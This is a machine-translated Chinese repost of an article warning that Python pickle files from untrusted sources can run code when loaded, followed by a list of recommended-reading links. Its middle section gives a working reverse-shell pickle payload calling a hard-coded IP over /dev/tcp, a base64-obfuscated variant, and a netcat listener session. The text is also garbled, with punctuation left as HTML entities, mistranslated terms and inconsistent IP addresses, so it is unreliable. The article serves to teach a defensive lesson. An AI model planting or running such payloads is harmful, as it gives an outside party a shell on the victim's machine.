不要相信泡菜

作者：leee | 来源：互联网 | 2023-05-23 18:06

如果您正在使用Python（尤其是用于机器学习），则应该对名为pickle的标准库模块有所了解。它用于Python对象序列化，

如果您正在使用Python &＃xff08;尤其是用于机器学习&＃xff09;&＃xff0c;则应该对名为pickle的标准库模块有所了解。它用于Python对象序列化&＃xff0c;在广泛的应用程序中非常方便。您可能需要序列化一些对象&＃xff1a;训练有素的scikit-learn模型&＃xff0c;经过长时间连接多个表后获得的Pandas DataFrame&＃xff1b; 基本上任何由异类数据组成的Python对象&＃xff0c;您都可能希望在将来在新环境中快速加载它们&＃xff08;对于同类数据&＃xff0c;例如神经网络权重或训练数据张量&＃xff0c;最好使用更合适的格式&＃xff0c;例如HDF5 &＃xff09;。

在本文中&＃xff0c;我想告诉您为什么取消从不可信来源获得的对象时要格外小心。

咸菜在野外有多普遍&＃xff1f;

有很多人在做ML项目并将它们放在GitHub仓库中&＃xff0c;因此不可避免地有些项目将包含pickle文件&＃xff08;按照惯例&＃xff0c;它们具有.pkl扩展名&＃xff09;。有时&＃xff0c;泡菜文件是故意放置在该文件中的&＃xff0c;以使其他人更容易使用预先训练的模型或准备好的数据集对象来再现结果。在其他时候&＃xff0c;它们在开发过程中被使用&＃xff0c;然后与项目的其余部分一起偶然地被推到仓库。

由于GitHub不允许单独按文件扩展名进行搜索&＃xff0c;因此很难准确估算GitHub上托管的pickle文件的确切数量。我尝试了以下查询&＃xff1a; extension:pkl model &＃xff0c;它搜索在文件中包含单词“ model”的泡菜文件。结果如下&＃xff1a;

现在&＃xff0c;腌制对象是将Python对象层次结构转换为字节流&＃xff0c;因此我不希望以此方式找到大多数腌制文件。根据GitHub搜索规则&＃xff0c;我必须至少指定一个单词来搜索内部文件&＃xff0c;然后选择“模型”。在此查询中找到的大多数文件要么是指向同一存储库中实际泡菜文件的符号链接&＃xff08;在符号链接路径中的某个位置带有“模型”一词&＃xff09;&＃xff0c;要么是某些包含大量人类可读数据的腌制对象&＃xff08;例如&＃xff0c;特征向量&＃xff09;用于某些NLP模型&＃xff09;。

我不太急于抓取公共GitHub存储库并计算所有pickle文件&＃xff1b; 但是我希望泡菜文件的实际数量比执行相对狭窄的查询后获得的16242个数量级大几个数量级。我知道这是一个非常粗略的估计&＃xff0c;但是我相信您同意&＃xff0c;在GitHub上腌制文件确实并不罕见。

潜在滥用

这是来自pickle docs的几个有趣的段落&＃xff1a;

当Pickler遇到某个类型的对象时&＃xff0c;它一无所知-例如扩展类型-它在两个地方寻找如何腌制它的提示。一种替代方法是使对象实现__reduce__()方法。如果提供&＃xff0c;则在腌制时将不带任何参数调用__reduce__() &＃xff0c;并且它必须返回字符串或元组。

…

返回一个元组时&＃xff0c;它的长度必须在2到5个元素之间。可选元素可以省略&＃xff0c;也可以提供None作为其值。将该元组的内容照常进行腌制&＃xff0c;并在去腌制时用于重建对象。

这意味着可以创建一个任意的Python对象&＃xff0c;该对象在不经过__reduce__()后将执行__reduce__()返回的代码。尽管对可以返回的事物的种类有一些限制&＃xff08;例如&＃xff0c;它必须是可调用的&＃xff09;&＃xff0c;但是创建一个在未腌制时可能存在危险的对象仍然相对容易。

设置反向Shell有效负载

在这种情况下可以做的最简单的事情之一就是在子流程中启动反向shell。这是一个示例对象&＃xff1a;

class ReverseShell(object):

def __reduce__(self):
import os
import subprocess
if os.name &＃61;&＃61; &＃39;posix&＃39;:
return (subprocess.Popen,
(&＃39;bash -i >& /dev/tcp/52.207.225.255/6006 0>&1&＃39;,
0, None, None, None, None, None, None, True))
# making this work for windows seems much harder
# please do share if you know how this can be done
elif os.name &＃61;&＃61; &＃39;nt&＃39;:
return None

__reduce__()必须返回的对象的结构非常具体。在此示例中&＃xff0c;返回包含两个项目的元组。以下是每个项目的细目分类&＃xff1a;

subprocess.Popen

将被调用以创建对象的初始版本的可调用对象。

此类用于在新进程中执行子程序。取消对对象进行酸洗后&＃xff0c;此新过程将在后台启动。

(&＃39;bash -i >& /dev/tcp/52.207.225.255/6006 0>&1&＃39;, -1, None, None, None, None, None, None, True)

可调用对象的参数元组。

第一个参数是要由子进程执行的程序。我&＃xff08;作为假想的攻击者&＃xff09;想要&＃xff1a;

bash -i以交互方式打开bash
&> /dev/tcp/52.207.255.255/6006将stderr和stdout都重定向到某个TCP / IP套接字。当我使用反向外壳程序时&＃xff0c;我想查看机器上的所有输出&＃xff08; 52.207.255.255 &＃xff09;; 我不希望受害者看到我正在远程执行什么命令。
0>&1将stdin重定向到stdout; 该重定向符号是反转I / O“流”方向所需的第二部分。没有这个&＃xff0c;标准输入仍然会从受害者的标准输出到我&＃xff08;攻击者&＃xff09;的标准输出。我希望这被扭转。

几乎所有其他参数都不重要&＃xff08;这就是为什么它们大多数都为None的原因&＃xff09;。我必须明确列出它们&＃xff0c;因为我需要将第8个参数的默认值更改为True &＃xff0c;这是在必须将参数放入元组时的唯一方法。第8个参数是shell&＃61;True &＃xff0c;它指定/bin/sh用于执行第一个参数中指定的内容。如果目标计算机具有无法识别/dev/tcp/...套接字的其他默认外壳程序并引发FileNotFoundError &＃xff08;例如zsh &＃xff09;&＃xff0c; FileNotFoundError 要这样做 。

使用反向外壳

既然我们已经了解了构成可能的恶意腌制对象的内容&＃xff0c;剩下的唯一事情就是腌制它&＃xff0c;并为有人腌制时做好准备。

>>> import pickle
>>> rs &＃61; ReverseShell()
>>> with open(&＃39;rs.pkl&＃39;, &＃39;wb&＃39;) as f:
... pickle.dump(rs, f)
...

对于此示例&＃xff0c;我将使用netcat只是在攻击者计算机的指定端口上侦听传入的TCP连接&＃xff1a;

52.207.255.255 
 attacker:~$ nc -l 6006

当受害人解开文件时&＃xff0c;头几秒钟似乎没有任何问题&＃xff1a;

victim:~$ python
>>> import pickle
>>> with open(&＃39;rs.pkl&＃39;, &＃39;rb&＃39;) as f:
... suspicious_obj &＃61; pickle.load(f)
...

同时&＃xff0c;在攻击者那边&＃xff0c;我可以列出受害者解开负载的目录&＃xff0c;并浏览受害者的计算机。只是为了验证它是否按预期工作&＃xff0c;我们可以检查有效用户ID确实是受害者之一。

attacker:~$ nc -l 6006
bash: no job control in this shell
bash-3.2$ ls
rs.pkl
bash-3.2$ whoami
victim

现在&＃xff0c;受害人将在几秒钟内通过尝试使用未腌制的对象注意到出了点问题&＃xff1a;

>>> suspicious_obj

在现实世界中&＃xff0c;可以安全地假设没有攻击者会坐下来&＃xff0c;等待反向外壳连接&＃xff0c;然后在受害者的计算机上手动执行某些操作。更有可能是脚本等待反向外壳连接&＃xff0c;然后该脚本将窃取数据/安装挖矿恶意软件/在更隐蔽的地方设置另一个反向外壳。攻击者具有与受害者相同的特权时&＃xff0c;有很多可能性。因此&＃xff0c;对于一个准备好的攻击者来说&＃xff0c;打开一秒钟或两秒钟的反向炮弹绰绰有余。

处理不信任的腌制对象

是否有某种简单的方法来检查腌制对象中是否包含恶意内容&＃xff1f;

如果我们考虑先前创建和腌制的对象的字节序列&＃xff0c;我们可以很好地了解如果未腌制该对象会发生什么。

52.207.255.255

即使传递给subprocess.Popen的参数字符串是base-64编码的&＃xff0c;仍然很明显&＃xff0c;腌制对象不正确&＃xff1a;

class ObfuscatedReverseShell(object):

def __reduce__(self):
import os
import subprocess
if os.name &＃61;&＃61; &＃39;posix&＃39;:
return (subprocess.Popen, (&＃39;eval &＃96;echo YmFzaCAtaSA&＃43;JiAvZGV2L3RjcC81Mi4yMDcuMjI1LjI1NS82MDA2IDA&＃43;JjE&＃61; | base64 -D&＃96;&＃39;, -1, None, None, None, None, None, None, True))

>>> rs &＃61; ObfuscatedReverseShell()
>>> with open(&＃39;rs.pkl&＃39;, &＃39;wb&＃39;) as f:
... pickle.dump(rs, f)
...
>>> with open(&＃39;rs.pkl&＃39;, &＃39;rb&＃39;) as f:
... obj_byte_seq &＃61; f.read()
...
>>> obj_byte_seq
b&＃39;\x80\x03c subprocess\nPopen \nq\x00(XT\x00\x00\x00 eval &＃96;echo YmFzaCAtaSA&＃43;JiAvZGV2L3RjcC81Mi4yMDcuMjI1LjI1NS82MDA2IDA&＃43;JjE&＃61; | base64 -D &＃96;q\x01J\xff\xff\xff\xffNNNNNN\x88tq\x02Rq\x03.&＃39;

我想尝试评估较大大小的腌制对象的字节序列会非常繁琐。无论如何&＃xff0c;简单地避免从不受信任的来源中解对象或在沙盒环境中进行操作都是更安全的。

如果您正在寻找的是预先训练的ML模型&＃xff0c;则最好使用单独提供的模型表示形式和权重来自己重建模型。例如&＃xff0c;可以从json / yaml加载.hdf5 模型表示形式&＃xff0c;然后从HDF5文件&＃xff08;扩展名为.hdf5 &＃xff09;加载权重。我浏览了HDF5 API&＃xff0c;没有看到任何允许在加载时执行任意代码的东西&＃xff0c;如pickle的__reduce__()那样。

这是本文中提到的代码示例的存储库&＃xff1a; pkl_rev_sh

From: https://hackernoon.com/dont-trust-a-pickle-a77cb4c9e0e

推荐阅读

nlp
gbdt伪代码,GBDT是什么意思

文章目录1.解释一下GBDT算法的过程1.1Boosting思想1.2GBDT原来是这么回事2.梯度提升和梯度下降的区别和联系是什么？3.GBDT的优点和局限性有哪 ... [详细]

蜡笔小新 2024-09-27 13:22:27
bash
Lunix历史及如何学习

1.Lunix是什么1.1Lunix是操作系统还是应用程序Lunix是一套操作系统，它提供了一个完整的操作系统当中最底层的硬件控制与资源管理的完整架构， ... [详细]

蜡笔小新 2024-09-27 20:30:30
get
DNNBrain：北师大团队出品，国内首款用于映射深层神经网络到大脑的统一工具箱...

导读深度神经网络(DNN)通过端到端的深度学习策略在许多具有挑战性的任务上达到了人类水平的性能。深度学习产生了具有多层抽象层次的数据表示;然而，它没有明确地提供任何关 ... [详细]

蜡笔小新 2024-09-26 12:34:26
get
前端微服务二

为了解决庞大的一整块后端服务带来的变更与扩展方面的限制，出现了微服务架构（Microservices）：微服务是面向服务架构（SOA）的一种变体，把应用程序设计成一系列松耦合的细粒 ... [详细]

蜡笔小新 2024-09-30 18:35:19
get
圣诞节到了，智能菌想送你一份礼物

关注网易智能，聚焦AI大事件，读懂下一个大时代！（机器学习算法地图见文末）圣诞节的赠书活动来了！ ... [详细]

蜡笔小新 2024-09-29 11:06:55
bash
Day 5 20190120 老男孩python学习第5天内容整理

今天继续看MasteringPycharm的视频，一个半小时看git的教学视频:视频1小时44分钟，看了2个半小时以上https:www.youtube ... [详细]

蜡笔小新 2024-09-28 19:29:55
bash
Ubuntu16.0464位安装armlinuxgcc交叉编译器以及samba服务器

交叉编译器是嵌入式开发的必要工具，但是由于目前大多数人使用64位ubuntu，在照着很多教程做的时候，就会失败，失败原因是64位ubuntu需要额外安装32位的兼容包。以arm-l ... [详细]

蜡笔小新 2024-09-28 18:16:39
bash
【懒懒的Python学习笔记一】

谨以此文献给最爱的詹詹：选择Python2还是Python3？使用2还是3一直是一个争论的要点，但是编程重要的是学习编程思想， ... [详细]

蜡笔小新 2024-09-28 15:17:36
object
JavaScript之变量和类型

变量和类型用处1.让代码可以重复使用(重用性)2.修改代码方便,灵活(灵活性)document.write(iloveyou)document.wri ... [详细]

蜡笔小新 2024-09-28 14:36:41
object
AI 学习路线：从Python开始机器学习

AI 学习路线：从Python开始机器学习 ... [详细]

蜡笔小新 2024-09-28 14:04:30
bash
13Linux基本命令和配置服务器来电后自动开机

本节所讲内容：Linux终端介绍Shell提示符BashShell基本语法基本命令的使用：ls、pwd、cd查看系统和BIOS硬件时间Linux如何获得 ... [详细]

蜡笔小新 2024-09-28 10:19:05
bash
跪服！大四学生开发了一整套文言编程

机器之心报道参与：思、Jamin用文言文写的官方编程教程《文言陰符》，类似pip那样的包管理工具「文淵閣」，还有文言编程开源IDE「文言齋 ... [详细]

蜡笔小新 2024-09-27 20:11:29
bash
Shell脚本统计文件行数

Shell脚本统计文件行数转自http:www.jb51.netarticle61943.htm示例：row_count.sh文件awk{printNR}row_co ... [详细]

蜡笔小新 2024-09-27 16:19:23
list
每日一书丨AI圣经《深度学习》作者斩获2018年图灵奖

2019年3月27日——ACM宣布，深度学习之父YoshuaBengio,YannLeCun,以及GeoffreyHinton获得了2018年的图灵奖， ... [详细]

蜡笔小新 2024-09-27 16:03:32
sum
深度强化学习Policy Gradient基本实现

全文共2543个字，2张图，预计阅读时间15分钟。基于值的强化学习算法的基本思想是根据当前的状态，计算采取每个动作的价值，然 ... [详细]

蜡笔小新 2024-09-25 17:01:10

leee

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章